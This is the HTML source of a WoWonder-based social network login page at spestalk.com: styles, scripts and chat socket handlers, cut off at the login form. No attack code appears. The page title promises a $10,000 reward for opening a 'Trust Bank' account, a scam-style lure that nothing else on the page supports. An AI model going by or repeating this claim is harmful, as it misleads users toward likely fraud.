      <!DOCTYPE html>
<html lang="en">
   <head>
      <title>Create Trust Bank Account To Claim $10,000 Reward</title>
      <meta http-equiv="Content-type" content="text/html; charset=UTF-8">
      <meta name="title" content="Trust Bank">
      <meta name="description" content="Trust Bank">

      
      <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
      <meta name="pinterest-rich-pin" content="false" />



            <meta property="og:title" content="Spestalk " />
      <meta property="og:type" content="article" />
      <meta property="og:url" content="https://spestalk.com" />
      <meta property="og:image" content="https://i.ibb.co/VB4dXcK/image-1200x630-2.png" />
      <meta property="og:image:secure_url" content="https://i.ibb.co/VB4dXcK/image-1200x630-2.png" />
      <meta property="og:description" content="Trust Bank" />
      



      <meta name="twitter:description" content="Trust Bank" />
     
              <link rel="canonical" href="https://spestalk.com/" />
            <link rel="shortcut icon" type="image/png" href="https://spestalk.com/themes/wowonder/img/icon.png"/>
      <link rel="stylesheet" href="https://spestalk.com/themes/wowonder/stylesheet/general-style-plugins.css?version=4.2.1">
            
      <style>
        .opacity_start {
          opacity: 0; 
          transition: all 0.5s;
        }
        .opacity_stop {
          opacity: 1; 
          transition: all 0.5s;
        }
      </style>

            <link rel="stylesheet" href="https://spestalk.com/themes/wowonder/stylesheet/welcome.css?version=4.2.1">
            <link rel="stylesheet" href="https://spestalk.com/themes/wowonder/stylesheet/font-awesome-4.7.0/css/font-awesome.min.css?version=4.2.1">

	  
     
      <script src="https://spestalk.com/themes/wowonder/javascript/jquery-3.1.1.min.js?version=4.2.1"></script>
      <script src="https://spestalk.com/themes/wowonder/javascript/jquery.ui.touch-punch.min.js?version=4.2.1"></script>

            <link rel="stylesheet" href="https://spestalk.com/themes/wowonder/stylesheet/bootstrap-select.min.css?version=4.2.1">
      <script src="https://spestalk.com/themes/wowonder/javascript/bootstrap-select.min.js?version=4.2.1"></script>
      
	        <link rel="stylesheet" href="https://spestalk.com/themes/wowonder/stylesheet/leaflet.css?version=4.2.1">
      <script src="https://spestalk.com/themes/wowonder/javascript/leaflet.js?version=4.2.1"></script>
      
      
              <link rel="stylesheet" href="https://spestalk.com/themes/wowonder/stylesheet/movies/style.movies.css?version=4.2.1" />
      
                  <link rel="stylesheet" href="https://spestalk.com/themes/wowonder/player/fluidplayer.min.css?version=4.2.1" type="text/css"/>
      <script src="https://spestalk.com/themes/wowonder/player/fluidplayer.min.js?version=4.2.1"></script>
	  
	  <link rel="stylesheet" href="https://spestalk.com/themes/wowonder/player/plyr.css?version=4.2.1" type="text/css"/>
      <script src="https://spestalk.com/themes/wowonder/player/plyr.js?version=4.2.1"></script>
	  
            <style>
      /* 

Add here your custom css styles Example: p { text-align: center; color: red; } 

*/      </style>
            <script src="https://spestalk.com/themes/wowonder/javascript/html2pdf.bundle.js?version=4.2.1"></script>
      <script src="https://spestalk.com/themes/wowonder/javascript/qrcode.js?version=4.2.1"></script>
      
      <script type="text/javascript">
                  function Wo_Ajax_Requests_File(){
            return "https://spestalk.com/requests.php"
         }
               function RunLiveAgora(channelName,DIV_ID,token) {
  var agoraAppId = '916aa96a5af64bd589e728828fe145b3';
  var token = token;

  var client = AgoraRTC.createClient({mode: 'live', codec: 'vp8'});
  client.init(agoraAppId, function () {


      client.setClientRole('audience', function() {
    }, function(e) {
    });
      let rand = Math.floor(Math.random() * 1000000);

    client.join(token, channelName, rand, function(uid) {
    }, function(err) {
    });
    }, function (err) {
    });

    client.on('stream-added', function (evt) {
    var stream = evt.stream;
    var streamId = stream.getId();

    client.subscribe(stream, function (err) {
    });
  });
  client.on('stream-subscribed', function (evt) {
    var remoteStream = evt.stream;
    remoteStream.play(DIV_ID);
    $('#player_'+remoteStream.getId()).addClass('embed-responsive-item');
  });
}
      </script>
      <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-0SWSS12QEX"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-0SWSS12QEX');
</script>
    <style>
@font-face {
    font-family: OpenSansLight;
    src: url("https://spestalk.com/themes/wowonder/fonts/OpenSansLight/OpenSansLight.woff") format("woff");
    font-weight: normal;
}
@font-face {
    font-family: OpenSansRegular;
    src: url("https://spestalk.com/themes/wowonder/fonts/OpenSansRegular/OpenSansRegular.woff") format("woff");
    font-weight: normal;
}
@font-face {
    font-family: OpenSansSemiBold;
    src: url("https://spestalk.com/themes/wowonder/fonts/OpenSansSemiBold/OpenSansSemiBold.woff") format("woff");
    font-weight: normal;
}
@font-face {
    font-family: OpenSansBold;
    src: url("https://spestalk.com/themes/wowonder/fonts/OpenSansBold/OpenSansBold.woff") format("woff");
    font-weight: normal;
}
:root {
	--plyr-color-main: #ff8700 ;
}

.wo_follow_btn {
    background: #ff8700 !important;
}
.wow_htag .htag_top {
    color:  #f67316 !important;
}
.wo_follow_btn:hover {
    background: #f67316 !important;
}
.publisher-box .publisher-hidden-option #progress .progress, .publisher-box .publisher-hidden-option #percent, .wo_new_wallet .wow_mini_wallets h5 {
	color: #ff8700;
}



.navbar-default {
    background: #0d0c94; border: none;
    height: 48px;
    box-shadow: 0 2px 4px rgba(0, 0, 0, 0.15);
}
.round-check input[type="checkbox"]:checked + label:before, .round-check input[type="radio"]:checked + label:before {
    background: #ff8700 !important;
}
.group-messages-wrapper a{
    color: #ff8700 !important;
}
ul.profile-completion-bar li.completion-bar div.completion-bar-status {
    background: #ff8700 !important;
}
/*.wow_srch_innr_filtr .round_check input:checked+label {
  background: #ff8700 !important;
  color: #ffffff !important;
}*/
.result-bar {
    background: #ff8700 !important;
}
.featured-users .sidebar-title-back, .featured-users .pro-me-here a {
    color: #444 !important;
}

.lang_select_modal .language_info {
    background: #ff8700}
.lang_select_modal .language_info h3 {
	color: #ffffff;
}



.avtive {
    border-color: #ff8700 !important;
}

.new-update-alert {
    background: #f67316;
	color: #ffffff;
}

#wo_nw_msg_page .msg_under_hood .mobilerightpane .messages-search-users-form .inner-addon .btn_contr {
	background: #ff8700;
	color: #ffffff;
}
#wo_nw_msg_page .msg_under_hood .mobilerightpane .messages-search-users-form .inner-addon button.btn {
	color: #ffffff;
}
#wo_nw_msg_page .msg_under_hood .mobilerightpane .messages-search-users-form .inner-addon button.btn:hover {
	background: #f67316;
}

.green-audio-player svg path {
	fill: #ff8700;
}
.green-audio-player .slider .gap-progress, .green-audio-player .slider .gap-progress .pin {
	background-color: #ff8700 !important;
}

.add_as_cont_list label input:checked+div {
    background-color: #ff8700;
    color: #ffffff;
}

.barloading {
  background-color: transparent !important;
}
.barloading:before {
    background-color: #8dd9ff;
}
.left-sidebar ul li a i {
    color: #ff8700 !important;
}
.cs-loader-inner, .main  {
    color: #ff8700;
}
.login input:focus, ul.profile-completion-bar li.completion-bar div.completion-bar-wrapper, .edit_grp_info_modal input.form-control:not(textarea):focus, .verfy_sett_email_phone input.form-control:not(textarea):focus {
    border-color: #ff8700 !important;
}
.login:not(.loading) button:hover {
    background: #f67316 !important;
    color: #ffffff;
}
.wo_setting_sidebar ul .list-group-item{
    background: #ff8700 !important;
}
.wo_setting_sidebar ul .list-group-item a{
    color: #ffffff;
}
.wo_settings_page .setting-panel input[type=text]:focus, .wo_settings_page .setting-panel input[type=email]:focus, .wo_settings_page .setting-panel input[type=password]:focus, .wo_settings_page .setting-panel select:focus, .wo_settings_page .setting-panel textarea:focus {
    border-color: #03A9F4;
}

#search-nearby-users .nearby-users-relationship-collapse li.active .friends_toggle{
    border-color: #ff8700;
}
#search-nearby-users .nearby-users-relationship-collapse li.active .friends_toggle:after{
    background: #ff8700;
}
.wo_page_hdng_menu > ul li.active a {
    box-shadow: inset 0px -2.5px #ff8700;
}
.login button, .postCategory h5, .wo_search_page .nav-tabs li.active a {
    background: #ff8700 !important;
    color: #ffffff !important;
}
.mejs-controls .mejs-time-rail .mejs-time-current, .mejs-controls .mejs-horizontal-volume-slider .mejs-horizontal-volume-current, .mejs-controls .mejs-volume-button .mejs-volume-slider .mejs-volume-current {
    background-color: #ff8700 !important;
    background: #ff8700 !important;
    background-image: #ff8700 !important;
}
.navbar-default .navbar-nav>.open>a, .navbar-default .navbar-nav>.open>a:focus, .navbar-default .navbar-nav>.open>a:hover {
    color: #ffffff !important;
    background-color: #333333 !important;
}
.navbar-default .navbar-nav>.active>a, .navbar-default .navbar-nav>.active>a:focus, .navbar-default .navbar-nav>.active>a:hover, .nav-names li:hover {
    color: #ffffff !important;
    background-color: #333333 !important;
}
body {
    background-color: rgba(29,12,12,0.01);
}
.navbar-default .navbar-nav>li>a {
    color: #ffffff;
    font-size: 13px;
}
a.unread-update {
    color: #ffffff !important;
}
.btn-main {
    color: #ffffff;
    background-color: #ff8700;
    border-color: #ff8700;
}
.btn-main:hover {
    color: #ffffff;
    background-color: #f67316;
    border-color: #f67316;
}
.wow_pops_head {
    background: #f67316;
}
.btn-main:focus {
	color: #ffffff;
}
.active-wonder {
    color: #ff8700;
}
.admin-panel .col-md-9 .list-group-item:first-child, .setting-panel .col-md-8 .list-group-item:first-child, .profile-lists .list-group-item:first-child, .col-md-8 .list-group-item:first-child, .col-md-3.custom .list-group-item:first-child, .col-sm-4 .list-group-item:first-child, .col-md-7 .list-group-item:first-child, .col-md-9 .list-group-item:first-child, .red-list .list-group-item:first-child, .active.list-group-item:first-child {
     color: #444;
     background-color: #fcfcfc;
     border-bottom: 1px solid #f1f1f1;
     padding: 18px;
}
.admin-panel .col-md-9 .list-group-item:first-child a, .setting-panel .col-md-8 .list-group-item:first-child a, .profile-lists .list-group-item:first-child a, .col-md-8 .list-group-item:first-child a, .col-md-7 .list-group-item:first-child a, .active.list-group-item:first-child a {
    color: #444 !important;
}
.list-group-item.black-list.active-list, .red-list.active-list {
    color: #ffffff;
    background-color: #ff8700;
}
.list-group-item.black-list {
    background: #ff8700;
}
.profile-top-line {
    background-color: #ff8700;
}
#bar {
    background-color: #ff8700;
}
.list-group-item.black-list a{
    color: #ffffff;
}
.list-group-item.black-list.active-list a{
    color: #ff8700;
}
.main-color, .small-text a {
    color: #ff8700 !important;
}
.nav-tabs>li.active>a, .nav-tabs>li.active>a:focus, .nav-tabs>li.active>a:hover {
    color: #ffffff;
    cursor: default;
    color: #ff8700;
    border-bottom: 1px solid #ff8700;
    background-color: transparent
}
.btn-active {
    color: #ffffff;
    background: #ff8700;
    outline: none;
    border: 1px solid #ff8700}
.btn-active:hover, .btn-active:focus {
    border: 1px solid #f67316;
    color: #ffffff;
    background: #f67316;
}
.btn-active-color:hover {
    background: #f67316;
}

.chat-tab .chat-textarea .chat-btns-w .chat_optns {
    color: #ff8700;
    fill: #ff8700;
}

.profile-style .user-follow-button button.btn-active, .btn-login, .btn-register {
    background: #ff8700;
    color: #ffffff;
}
.profile-style .user-follow-button button.btn-active:hover, .btn-login:hover, .btn-login:focus, .btn-register:hover, .btn-register:focus {
    color: #ffffff;
    background: #f67316;
}
.panel-login>.panel-heading a.active {
    color: #ff8700;
    font-size: 18px;
}
.hash {
    color: #ff8700;
}
.message-text .hash {
    color: #fff !important;
}
.search-container .search-input {
    color: #ffffff !important;
    background: rgba(35,14,240,0.59) !important;
}
.chat-messages-wrapper .outgoing .message-text {
    background: #ff8700;
    color: #ffffff;
}
.normal-container {
    width: 100%;
    height: 100%;
    margin-top: 15px;
}
.active.fa-thumbs-up {
    color: #ff8700;
}
.api-ex-urls {
    background-color: #ff8700; color: #ffffff;
}
.user-username {
    color: #ff8700;
}
.upload-image {
    border: 3px dashed #ff8700;
}
.events-tab-list li { background-color: #ff8700; }
.events-tab-list li:hover { background-color: #ff8700; }
.active-e-tab { background-color: #ff8700 !important; }
.main { color: #ff8700 !important; }
.events-list-dropup-menu ul li a:hover { background: #ff8700; }
.usr-offline { color: #ff8700; }
.blog-dd-ul li span:hover, .blog-dd-ul li a:hover { background: #ff8700 !important; }
.blog_publ {background: #ff8700 ; border: 1px solid #ff8700 ; }
.slide-film-desc:hover, .movies-top-breadcrumb li:hover, .movies-top-breadcrumb li a:hover{
    color: #ff8700 !important;
}
.movies h3.latest-movies, h3.recommended-movies {
    border-left: 3px solid  #ff8700;
}

.wo_user_profile .user-bottom-nav li .menuactive {
    border-bottom: 2px solid #ff8700;
    color:#ff8700;
}
.ads-navbar-wrapper ul li a.active {
	border-color: #ff8700;
}
.ads_mini_wallet, .wo_page_hdng_innr span {
	background-color: #ff8700;
	color: #ffffff;
}
.btn-loading:after {
	background-color: #ff8700;
}
.wow_pub_privacy_menu li label input[type="radio"]:checked+span {
	background-color: #ff8700;color: #ffffff;
}
.order_by ul li.active a {background: #ff8700 !important;color: #ffffff !important;}




#welcomeheader .mdbtn:hover{background-color: #ffffff;color: #0d0c94;border-color: #ffffff;}

.post .panel.active_shadow {
    box-shadow: 0 0 0 1.5px #ff8700 !important;
}

.ui-widget-header .ui-state-default, .wo_adv_search_filter_side .ui-slider .ui-slider-range, .wo_adv_search_filter_side .ui-slider .ui-slider-handle {
    background-color: #ff8700;
}
.reaction-1::before {
    content: "Like";
}
.reaction-2::before {
    content: "Love";
}
.reaction-3::before {
    content: "HaHa";
}
.reaction-4::before {
    content: "WoW";
}
.reaction-5::before {
    content: "Sad";
}
.reaction-6::before {
    content: "Angry";
}
/*.reaction-like::before {
    content: "Like";
}
.reaction-love::before {
    content: "Love";
}
.reaction-haha::before {
    content: "HaHa";
}
.reaction-wow::before {
    content: "WoW";
}
.reaction-sad::before {
    content: "Sad";
}
.reaction-angry::before {
    content: "Angry";
}*/

.navbar-default .dropdown-menu.ani-acc-menu >li>a:hover {
    color: #ffffff;background-color: #ff8700;
}
#wo_nw_msg_page .msg_under_hood .mobilerightpane .messages-search-users-form .wo_msg_tabs li.active a, .text-sender-container .msg_usr_info_top_list .msg_usr_cht_opts_btns > span:hover, .text-sender-container .msg_usr_info_top_list .msg_usr_cht_usr_data a:hover, .wo_chat_tabs li.active a {
    color: #ff8700;
}
.text-sender-container .outgoing .message-model .message {background-color: #ff8700;color: #ffffff;}
.text-sender-container .outgoing .message-model .message p, .text-sender-container .outgoing .message-model .message a {color: #ffffff;}

#notification-popup {
     position: fixed;
     left: 20px;
     width: 300px;
     bottom: 20px;
     z-index: 10000;
}
#notification-popup .notifications-popup-list:empty {
      padding: 0;
}
#notification-popup .notifications-popup-list {
    position: relative;
    background:  #333333 !important;
    border-radius: 10px;
    padding: 6px;
    width: 100%;
    margin-bottom: 10px;
    z-index: 10000;
    box-shadow: 0 2px 4px rgb(0 0 0 / 10%);
}
#notification-popup .notifications-popup-list, #notification-popup .notifications-popup-list a, #notification-popup .notifications-popup-list .main-color, #notification-popup .notifications-popup-list svg, #notification-popup .notifications-popup-list .notification-text, #notification-popup .notifications-popup-list .notification-time {
    color: #ffffff !important;
}
#notification-popup .notifications-popup-list .notification-list {
    border-radius: 10px;
}
#notification-popup .notifications-popup-list .notification-list:hover {
    background: rgba(255, 255, 255, 0.1);
}
</style>

          <style>.login_left_combo{color:#ffffff}body{background: #ff8700 !important;}   .wo_regi_features:before{content: '';display: block;background-image: url(https://spestalk.com/themes/wowonder/img/backgrounds/login.jpg);background-repeat: no-repeat;background-size: cover;background-position:center;position: absolute;top: 0;left: 0;right: 0;bottom: 0;opacity: 0.35;}
    </style>
      
            <script src="https://accounts.google.com/gsi/client" async defer></script>
              <script src="https://spestalk.com/themes/wowonder/javascript/agora.js?version=4.2.1"></script>
              <script src="https://spestalk.com/themes/wowonder/javascript/hls.js?version=4.2.1"></script>
        <script crossorigin="anonymous" src="https://spestalk.com/themes/wowonder/javascript/sdk.js?version=4.2.1"></script>
    
    <script src="https://spestalk.com/themes/wowonder/javascript/socket.io.js?version=4.2.1"></script>
      <script>
      let nodejs_system = "1";
      let socket = null
      let groupChatListener = {}
      $(()=>{
                var main_hash_id = $('.main_session').val();
                  socket = io("https://spestalk.com:449/?hash=" + main_hash_id)
                let recipient_ids = []
        let recipient_group_ids = []
        setTimeout(function(){
          var inputs = $("input.chat-user-id");
          $(".chat-wrapper").each(function(){
            let id = $(this).attr("class").substr("chat-wrapper".length);
            let isGroup = $(this).attr("class").substr("chat-wrapper".length).split("_").includes("group")
            if(isGroup) {
              id = id.substr(' chat_group_'.length)
              recipient_group_ids.push(id)
            } else{
              id = id.substr(' chat_'.length)
              recipient_ids.push(id)
            }
          });
          socket.emit('join', {username: "", user_id: _getCookie('user_id'), recipient_ids, recipient_group_ids }, ()=>{
              // setInterval(() => {
              //   socket.emit("get_user_status", {user_id: _getCookie("user_id")})
              // }, 2000);
              setInterval(() => {
                socket.emit("ping_for_lastseen", {user_id: _getCookie("user_id")})
              }, 2000);
          });
         }, 2500);

        socket.on("reconnect", ()=>{
          let recipient_ids = []
          let recipient_group_ids = []
          setTimeout(function(){
            var inputs = $("input.chat-user-id");
            $(".chat-wrapper").each(function(){
              let id = $(this).attr("class").substr("chat-wrapper".length);
              let isGroup = $(this).attr("class").substr("chat-wrapper".length).split("_").includes("group")
              if(isGroup) {
                id = id.substr(' chat_group_'.length)
                recipient_group_ids.push(id)
              } else{
                id = id.substr(' chat_'.length)
                recipient_ids.push(id)
              }
            });
            socket.emit('join', {username: "", user_id: _getCookie('user_id'), recipient_ids, recipient_group_ids }, ()=>{
                setInterval(() => {
                  socket.emit("ping_for_lastseen", {user_id: _getCookie("user_id")})
                }, 2000);
            });
          }, 3000);
        })
        socket.on("decline_call", (data) => {
          $('#re-calling-modal').addClass('calling');
          document.title = document_title;
          setTimeout(function () {
            $( '#re-calling-modal' ).remove();
            $( '.modal-backdrop' ).remove();
            $( 'body' ).removeClass( "modal-open" );
          }, 3000);
          $( '#re-calling-modal' ).remove();
          $('.modal-backdrop.in').hide();
          Wo_CloseModels();
          Wo_PlayAudioCall('stop');
          Wo_PlayVideoCall('stop');
        })
        socket.on("lastseen", (data) => {
            //$('.messages-text[data-message-id='+data.message_id+']').length > 0
            if (data.message_id && data.user_id) {
                  var chat_container = $('.chat-tab').find('#chat_' + data.user_id);
                  if ($('#messageId_'+data.message_id).length > 0) {

                        if (chat_container.length > 0) {
                              chat_container.find('.message-seen').hide();

                        }
                        else{
                              $('.message-seen').hide();
                        }
                        $('#messageId_'+data.message_id).find('.message-seen').hide().html('<i class="fa fa-check"></i> Seen (<span class="ajax-time" title="' + data.time + '">' + data.seen + '</span>)').fadeIn(300);
                        if (chat_container.length > 0) {
                              //chat_container.find('.online-toggle-hdr').attr('style', '');
                              setTimeout(function(){
                                 chat_container.find('.chat-messages-wrapper').scrollTop(chat_container.find('.chat-messages-wrapper')[0].scrollHeight);
                              }, 100);
                        }
                        else{
                           $(".messages-container").animate({
                               scrollTop: $('.messages-container')[0].scrollHeight
                           }, 200);
                        }
                  }

            }
          })
         socket.on("register_reaction", (data) => {
              if(data.status == 200) {
                  $('.post-reactions-icons-m-'+data.id).html(data.reactions);
              }
          });
          socket.on("on_user_loggedin", (data) => {
            $('#chat_' + data.user_id).find('.chat-tab-status').addClass('active');
            $("#online_" + data.user_id).find('svg path').attr('fill', '#60d465');
            $("#messages-recipient-" + data.user_id).find('.dot').css({"background-color": "#63c666"});
          });
          socket.on("on_user_loggedoff", (data) => {
            $('#chat_' + data.user_id).find('.chat-tab-status').removeClass('active');
            $("#online_" + data.user_id).find('svg path').attr('fill', '#dddddd');
            $("#messages-recipient-" + data.user_id).find('.dot').css({"background-color": "lightgray"});
          });
          socket.on("update_new_posts", (data) => {
            Wo_intervalUpdates(1);
          });
          socket.on("on_avatar_changed", (data) => {
            $("#online_" + data.user_id).find('img').attr('src', data.name);
            $("#messages-recipient-" + data.user_id).find('img').attr('src', data.name);
          });
          socket.on("on_name_changed", (data) => {
            $("#online_" + data.user_id).find('#chat-tab-id').html(data.name);
            $("#messages-recipient-" + data.user_id).find('.messages-user-name').html(data.name);
          });
          socket.on("new_notification", (data) => {
                         Wo_GetLastNotification();
                         current_notifications = $('.notification-container').find('.new-update-alert').text();
            $('.notification-container').find('.new-update-alert').removeClass('hidden');
            $('.notification-container').find('.sixteen-font-size').addClass('unread-update');
            $('.notification-container').find('.new-update-alert').text(Number(current_notifications) + 1).show();
            document.getElementById('notification-sound').play();
          });
          socket.on("new_notification_removed", (data) => {
            current_notifications = $('.notification-container').find('.new-update-alert').text();
            $('.notification-container').find('.new-update-alert').removeClass('hidden');
            if (Number(current_notifications) > 0) {
               if ((Number(current_notifications) - 1) == 0) {
                  $('.notification-container').find('.new-update-alert').addClass('hidden');
                  $('.notification-container').find('.new-update-alert').addClass('hidden').text('0').hide();
               } else {
                  $('.notification-container').find('.sixteen-font-size').addClass('unread-update');
                  $('.notification-container').find('.new-update-alert').text(Number(current_notifications) - 1).show();
               }
            } else if (Number(current_notifications) == 0) {
               $('.notification-container').find('.new-update-alert').addClass('hidden');
               $('.notification-container').find('.new-update-alert').addClass('hidden').text('0').hide();
            }
          });

          socket.on("new_request", (data) => {
            current_requests= $('.requests-container').find('.new-update-alert').text();
            $('.requests-container').find('.new-update-alert').removeClass('hidden');
            $('.requests-container').find('.sixteen-font-size').addClass('unread-update');
            $('.requests-container').find('.new-update-alert').text(Number(current_requests) + 1).show();
            document.getElementById('notification-sound').play();
          });
          socket.on("new_request_removed", (data) => {
            current_requests = $('.requests-container').find('.new-update-alert').text();
            $('.requests-container').find('.new-update-alert').removeClass('hidden');
            if (Number(current_requests) > 0) {
               if ((Number(current_requests) - 1) == 0) {
                  $('.requests-container').find('.new-update-alert').addClass('hidden');
                  $('.requests-container').find('.new-update-alert').addClass('hidden').text('0').hide();
               } else {
                  $('.requests-container').find('.sixteen-font-size').addClass('unread-update');
                  $('.requests-container').find('.new-update-alert').text(Number(current_requests) - 1).show();
               }
            } else if (Number(current_requests) == 0) {
               $('.requests-container').find('.new-update-alert').addClass('hidden');
               $('.requests-container').find('.new-update-alert').addClass('hidden').text('0').hide();
            }
          });

          socket.on("messages_count", (data) => {
             current_messages_number = data.count;
             if (current_messages_number > 0) {
               $("[data_messsages_count]").text(current_messages_number).removeClass("hidden");
               $("[data_messsages_count]").attr('data_messsages_count', current_messages_number);
             } else {
               $("[data_messsages_count]").text(current_messages_number).addClass("hidden");
               $("[data_messsages_count]").attr('data_messsages_count', "0");
             }
          });
          socket.on("new_video_call", (data) => {
             Wo_intervalUpdates(1);
          });
          socket.on("load_comment_replies", (data) => {
             Wo_ViewMoreReplies(data.comment_id);
          });


        socket.on("color-change", (data)=>{
          if (data.sender == 0) {
            $(".chat_" + data.id).find('.outgoing .message-text, .outgoing .message-media').css('background', data.color);
            $(".chat_" + data.id).find('.outgoing .message-text').css('color', '#fff');
            $(".chat_" + data.id).find('.select-color path').css('fill', data.color);
            $(".chat_" + data.id).find('#color').val(data.color);
            $(".chat_" + data.id).find('.close-chat a, .close-chat svg').css('color', data.color);
          }
          let user_id = $('#user-id').val();
          if(""+user_id === ""+data.id) {
            if(data.sender == 0){
                  $('.send-button').css('background-color', data.color);
                  $('.send-button').css('border-color', data.color);
                  $('#wo_msg_right_prt .message-option-btns .btn svg').css('color', data.color);
                  $(".messages-container").find(".pull-right").find(".message").css('background-color', data.color);
                  $(".messages-container").find(".pull-right").find(".message-text").css('background-color', data.color)
              }
          }
        })
        var new_current_messages = 0;
        socket.on("private_message", (data)=>{
          $('#chat_' + data.sender).find('.online-toggle-hdr').addClass('white_online');;
          var chat_container = $('.chat-tab').find('.chat_main_' + data.id);
          if (chat_container.length > 0) {
             chat_container.find('.chat-messages-wrapper').find("div[class*='message-seen']").empty();
             chat_container.find('.chat-messages-wrapper').find("div[class*='message-typing']").empty();
             chat_container.find('.chat-messages-wrapper').append(data.messages_html);
             setTimeout(function(){
                  chat_container.find('.chat-messages-wrapper').scrollTop(chat_container.find('.chat-messages-wrapper')[0].scrollHeight);
               }, 100);
             if (data.sender == 0) {
               $(".chat_" + data.id).find('.outgoing .message-text, .outgoing .message-media').css('background', data.color);
               $(".chat_" + data.id).find('.outgoing .message-text').css('color', '#fff');
               $(".chat_" + data.id).find('.select-color path').css('fill', data.color);
               $(".chat_" + data.id).find('#color').val(data.color);
               $(".text-sender-container .red-list").css('background', data.color);
               $(".text-sender-container .btn-file").css('background', data.color);
               $(".text-sender-container .btn-file").css('border-color', data.color);
             }
          } else {
            current_number = $('#online_' + data.id).find('.new-message-alert').text();
            $('#online_' + data.id).find('.new-message-alert').html(Number(current_number) + 1).show();

          }
          if (!chat_container.find("#sendMessage").is(":focus")) {
            if(data.sender != 0){
                document.getElementById('message-sound').play();
            }
          }
          if (!chat_container.find('#sendMessage').is(':focus') && chat_container.length == 0) {
             new_current_messages = new_current_messages + 1;
             current_messages_number = Number($("[data_messsages_count]").attr('data_messsages_count')) + 1;
             $("[data_messsages_count]").text(current_messages_number).removeClass("hidden");
             $("[data_messsages_count]").attr('data_messsages_count', current_messages_number);
             document.title = 'New Message | ' + document_title;
          }

        })

        socket.on("group_message", (data)=>{
              var chat_messages_wrapper = $('.group-messages-wrapper-'+data.id);
              if (data.status == 200) {
              if ($(".group-messages-wrapper-"+data.id).find('.no_message').length > 0) {
                $(".group-messages-wrapper-"+data.id).find('.chat-messages').html(data.html);
              }else{
                $(".group-messages-wrapper-"+data.id).find('.chat-messages').append(data.html);
              }
              if ($('.chat_group_'+data.id).length == 0) {
              current_messages_number = Number($("[data_messsages_count]").attr('data_messsages_count')) + 1;
              $("[data_messsages_count]").text(current_messages_number).removeClass("hidden");
              $("[data_messsages_count]").attr('data_messsages_count', current_messages_number);
              document.title = 'New Message | ' + document_title;
              document.getElementById('message-sound').play();
            }

              chat_messages_wrapper.scrollTop(chat_messages_wrapper[0].scrollHeight);
            }
          })

              });
      </script>
              <script src="https://spestalk.com/themes/wowonder/javascript/bootstrap-tagsinput-latest/src/bootstrap-tagsinput.js?version=4.2.1"></script>
      
	  
	<script src="https://spestalk.com/themes/wowonder/javascript/flickity.pkgd.min.js?version=4.2.1"></script>
        <link rel="stylesheet" href="https://spestalk.com/themes/wowonder/javascript/green-audio-player/green-audio-player.css?version=4.2.1" />
      <script src="https://spestalk.com/themes/wowonder/javascript/green-audio-player/green-audio-player.js?version=4.2.1"></script>
	  
		<link rel="stylesheet" href="https://spestalk.com/themes/wowonder/stylesheet/flatpickr.min.css?version=4.2.1">
		<script src="https://spestalk.com/themes/wowonder/javascript/flatpickr.js?version=4.2.1"></script>
   </head>

   <body >
      <input type="hidden" id="get_no_posts_name" value="No more posts">
        <div id="focus-overlay"></div>
      <input type="hidden" class="seen_stories_users_ids" value="">
      <input type="hidden" class="main_session" value="c5f2cda7466ab7a2fae6">
                  <div class="content-container welcome-container" style="">
         <div class="ad-placement-header-footer">
                     </div>
         <div id="contnet" class="effect-load"><div class="wrapper">
   <div class="login">
      <div class="login_left_combo_parent">
         <div class="login_left_combo">









          
   




            <div class="fadeInUp animated animated_6 img"><img src="https://spestalk.com/themes/wowonder/img/backgrounds/welcome.jpg"></div>
         </div></>
         <svg xmlns="http://www.w3.org/2000/svg" width="793" height="1024" viewBox="0 0 793 1024" preserveAspectRatio="none"> <defs> <linearGradient id="linear-gradient" x1="0.066" y1="0.066" x2="1.068" y2="1.075" gradientUnits="objectBoundingBox"> <stop offset="0"/> <stop offset="1" stop-color="#ff8700"/> </linearGradient> <clipPath id="clip-path"> <rect id="Rectangle_9" data-name="Rectangle 9" width="793" height="1024" fill="#fff"/> </clipPath> <filter id="Path_12714" x="-258.718" y="668.282" width="1450.299" height="710.185" filterUnits="userSpaceOnUse"> <feOffset dy="13" input="SourceAlpha"/> <feGaussianBlur stdDeviation="15.5" result="blur"/> <feFlood flood-opacity="0.161"/> <feComposite operator="in" in2="blur"/> <feComposite in="SourceGraphic"/> </filter> <filter id="Path_12715" x="-105.819" y="797.563" width="1134.181" height="538.486" filterUnits="userSpaceOnUse"> <feOffset dy="15" input="SourceAlpha"/> <feGaussianBlur stdDeviation="17" result="blur-2"/> <feFlood flood-opacity="0.349"/> <feComposite operator="in" in2="blur-2"/> <feComposite in="SourceGraphic"/> </filter> </defs> <g id="Rectangle_8" data-name="Rectangle 8" stroke="#ff8700" stroke-width="1" fill="url(#linear-gradient)" style="mix-blend-mode: multiply;isolation: isolate"> <rect width="793" height="1024" stroke="none"/> <rect x="0.5" y="0.5" width="792" height="1023" fill="none"/> </g> <g id="Mask_Group_4" data-name="Mask Group 4" clip-path="url(#clip-path)"> <g id="Group_13906" data-name="Group 13906" transform="translate(1227.782 1153.043) rotate(180)" opacity="0.54"> <path id="Path_12713" data-name="Path 12713" d="M-5894.321-7099.4s163.513,301.819,384.911,412.243,267.171-29.452,500.682,29.452,205.095,175.206,371.288,195.191,226.553,0,293.483-144.4-39.545-197.743-39.545-346.053,39.545-218.046,39.545-218.046Z" transform="translate(5874.603 7034.028)" fill="#ff8700" opacity="0.68"/> <g transform="matrix(-1, 0, 0, -1, 1227.78, 1153.04)" filter="url(#Path_12714)"> <path id="Path_12714-2" data-name="Path 12714" d="M-5894.321-7109.194s141.139,260.521,332.244,355.836,230.614-25.422,432.174,25.422,177.032,151.232,320.484,168.483,195.554,0,253.326-124.639-34.134-170.686-34.134-298.7,34.134-188.211,34.134-188.211Z" transform="translate(-4749.24 -5852.04) rotate(180)" fill="#ff8700" opacity="0.46"/> </g> <g transform="matrix(-1, 0, 0, -1, 1227.78, 1153.04)" filter="url(#Path_12715)"> <path id="Path_12715-2" data-name="Path 12715" d="M-5894.321-7124s107.332,198.118,252.66,270.6,204.216-38.665,357.5,0,183.031,93.193,210.813,104.632,152.776,42.826,196.709-51.958-25.958-129.8-25.958-227.154,25.958-143.128,25.958-143.128Z" transform="translate(-4916.96 -5900.96) rotate(180)" fill="#ff8700" opacity="0.77"/> </g> </g> </g> </svg>
      </div>
      <div class="col-md-6">
         <div class="login_innre">











    <form id="login" method="post" 
